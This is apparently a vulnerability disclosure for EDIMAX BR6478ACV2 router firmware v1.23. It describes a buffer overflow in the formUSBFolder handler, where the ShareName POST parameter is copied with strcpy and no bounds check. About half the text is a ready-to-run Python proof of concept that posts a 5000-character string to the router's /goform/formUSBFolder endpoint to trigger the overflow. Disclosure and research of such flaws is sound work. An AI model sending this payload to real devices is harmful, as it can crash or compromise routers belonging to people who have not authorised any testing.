EDIMAX-BR6478ACV2-formUSBFolder

Overview

The device's official website: https://download.edimax.com/mw/cufiles/files/download/Firmware/BR6478ACV2_v1.23.zip

Affected version

BR6478ACV2_v1.23

Vulnerability details

The EDIMAX BR6478ACV2_v1.23 firmware has a buffer overflow vulnerability in the formUSBFolder function. The v4/v5 variables receive the ShareName/SelectName parameters from a POST request. However, since the user can control the input of these variables, the statement strcpy(&v19[17], v4); can cause a buffer overflow.

POC

import requests

ip = "192.168.2.1"

data = {
    "addFolder":     "1",
    "ShareName":     "A"*5000,
}
url = f'http://{ip}/goform/formUSBFolder'

res = requests.post(url=url, data=data, verify=False)
print(res)